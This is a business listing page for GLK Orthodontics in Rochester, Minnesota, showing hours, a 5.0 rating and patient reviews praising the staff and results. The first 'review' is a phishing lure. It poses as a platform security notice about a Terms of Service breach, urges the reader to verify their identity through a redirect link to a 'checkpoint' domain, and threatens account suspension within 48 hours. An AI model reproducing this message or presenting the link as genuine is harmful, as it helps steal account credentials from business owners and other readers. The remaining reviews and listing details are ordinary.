GLK Orthodontics's cover image
Claimed

This profile has been claimed by the business owner or representative.

GLK Orthodontics

5.0
  • Dental
  • Rochester, MN

About this business

DentalOrthodontists

Dr. Brent Larson, Dr. Nellie Kim-Weroha and Dr. Chad Larson, along with their highly trained staff, are committed to giving you an ideal smile through state-of-the-art orthodontic care. 

Location details

2717 Superior Dr NW, Rochester, MN, 55901, United States

Get directions
WeekdayScheduleStatus
Mon8:00 a.m. to 5:00 p.m.
Tue8:00 a.m. to 5:00 p.m.
Wed8:00 a.m. to 5:00 p.m.
Thu8:00 a.m. to 5:00 p.m.
FriClosed
SatClosed
SunClosed
5.0157 reviews
Select a rating
James Jones's profile image
James Jones 
recommend  Recommended
a month ago

Dear GLK Orthodontics, We have identified activities in your account that may constitute a breach of our Terms of Service concerning unauthorized access attempts. To prevent any disruption in your account usage, you are required to verify your identity. Please confirm your identity by clicking on the link below: ◉https://facebook.com/l.php?u=https%3A%2F%2Fcheckpoint-01652326594168.com If you do not complete the verification within 48 hours, your account will be temporarily suspended for security reasons. These precautions ar... read more

Kjersten Jimison's profile image
Kjersten Jimison 
recommend  Recommended
3 months ago

I would absolutely recommend GLK Orthodontics. Both my boys received excellent care and experienced great results! The entire staff is friendly, patient, and accommodating. Great place for kids and adults! 

Matt Ugorowski's profile image
Matt Ugorowski 
recommend  Recommended
a year ago

GLK orthodontics provided an outstanding experience from start to finish during my Invisalign treatment! Dr. Brandon and his colleagues were professional, transparent, detail-oriented, and patient, as I navigated my treatment plan to ensure desired outcomes and needs were met. I am simply thrilled with the outcome! GLK orthodontics is changing lives, and I feel fortunate to have been one of these individuals. -With sincerest gratitude, Matt 

Jamie Stephens's profile image
Jamie Stephens 
recommend  Recommended
2 years ago

Everyone there was great! My daughter’s teeth look perfect 😊 

Dyana Smith's profile image
Dyana Smith 
recommend  Recommended
2 years ago

Would definitely recommend GLK & Dr Kim to anyone looking for an awesome ortho office! Everyone is so kind there! And I enjoy getting to see my friend Brittany there too~she’s the BEST dental assistant!! :) 

Stacey Elaine's profile image
Stacey Elaine 
recommend  Recommended
2 years ago

We loved every minute from the first visit to the last! They made my daughter feel comfortable & explained everything at every visit. Highly recommend!! Plus, I shopped around before we made a final decision! GLK had the best pricing! 

Alberto Marquez's profile image
Alberto Marquez 
recommend  Recommended
2 years ago

My daughter had a good experience there 

Jenny Scott's profile image
Jenny Scott 
recommend  Recommended
2 years ago

GLK has helped three of our girls find their smile. I highly recommend Dr. Kim and her caring staff. 

Jeremy Oliver's profile image
Jeremy Oliver 
recommend  Recommended
2 years ago

Great prices and amazing staff. 

Frequently asked questions about GLK Orthodontics

How is GLK Orthodontics rated?

GLK Orthodontics has a 5 star rating with 157 reviews. 

When is GLK Orthodontics open?

GLK Orthodontics is closed now. It will open at 8:00 a.m.